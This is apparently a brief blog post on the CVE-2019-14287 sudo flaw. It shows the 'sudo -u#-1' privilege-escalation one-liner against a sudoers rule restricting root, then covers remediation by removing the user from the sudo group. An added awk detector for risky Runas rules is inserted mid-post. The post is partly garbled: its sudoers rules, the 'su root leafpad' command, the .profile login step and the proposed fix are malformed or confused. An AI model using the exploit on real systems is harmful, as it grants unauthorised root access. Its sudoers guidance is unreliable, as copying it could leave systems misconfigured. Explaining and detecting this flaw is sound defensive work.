CVE-2019-14287 - Linux sudo escalation of privileges
1. Create a user and make sure they're able to log in
Set up the login and the ability to execute tasks:
First you would have created a user:
useradd -m bob -G sudo -s /bin/bash
passwd bob
To be able to log in, add the following to .profile (at the top):
vi .profile
PATH=/usr/sbin:$PATH
Check who's in sudo with:
getent group sudo
groups bob
Edit the sudoers file:
vi /etc/sudoers
Because bob is a member of sudo, he can perform administrative tasks.
2. Partially restricting the user privilege specification
This doesn't help too much because of the flaw.
myhost operators =(ALL,!root) !ALL
To check which user executes this:
sudo -u#-1 id -u
To execute a command as root:
su root leafpad
This cannot be executed because of that rule.
Or, with the user's password, it can be executed like this:
sudo -u#-1 leafpad
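An added example, not part of the original post: a shell function that scans a sudoers file for Runas user lists combining ALL with a negated entry such as !root, which is the rule shape the flaw above bypasses. The function name find_risky_runas and the sample rules are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: flag sudoers rules whose Runas user list combines ALL with a
# negated entry, e.g. (ALL, !root). Simplified: ignores aliases, #include
# directives and backslash line continuations.

# Print "<line number>: <rule>" for every matching rule in the file "$1".
find_risky_runas() {
    awk '
        /^[ \t]*(#|$)/ { next }                 # skip comments and blank lines
        match($0, /=[ \t]*\([^)]*\)/) {         # the "= (runas list)" part
            runas = substr($0, RSTART, RLENGTH)
            sub(/^=[ \t]*\(/, "", runas)        # strip leading "= ("
            sub(/\)$/, "", runas)               # strip trailing ")"
            sub(/:.*/, "", runas)               # keep user list, drop :group list
            n = split(runas, entry, ",")
            has_all = 0; has_neg = 0
            for (i = 1; i <= n; i++) {
                gsub(/[ \t]/, "", entry[i])
                if (entry[i] == "ALL") has_all = 1
                if (entry[i] ~ /^!/)   has_neg = 1
            }
            if (has_all && has_neg) printf "%d: %s\n", FNR, $0
        }
    ' "$1"
}

# Constructed sample sudoers content (not taken from a real host).
sample=$(mktemp)
cat > "$sample" <<'EOF'
# bob myhost = (ALL, !root) ALL
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
bob myhost = (ALL, !root) /usr/bin/vi
%sudo ALL=(ALL:!operator) !ALL
EOF
find_risky_runas "$sample"      # reports only line 4
rm -f "$sample"
```

Run it as root against /etc/sudoers and each file under /etc/sudoers.d; any rule it reports relies on a negated Runas entry and should be rewritten to list the permitted target users explicitly.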
3. Remediation and Check Group Membership
You could add another line like this:
%sudo ALL=(ALL:!operator) !ALL
The result is that Bob cannot perform administrative tasks anymore.
Resolution
But to avoid this strange setup altogether, you just need to make sure Bob doesn't have sudo rights.
groups root
groups bob
Set default group for Bob
sudo usermod -a -G operator bob
groups bob
gpasswd -d bob sudo
groups bob
Result: Bob is no longer a member of sudo and cannot perform Administrative tasks and is just an operator.
Hardened Execution - Least Privilege
As you can see, it's wiser not to give users sudo rights.
And this flaw is history once you update your Linux system.
Thank you for reading.
Martijn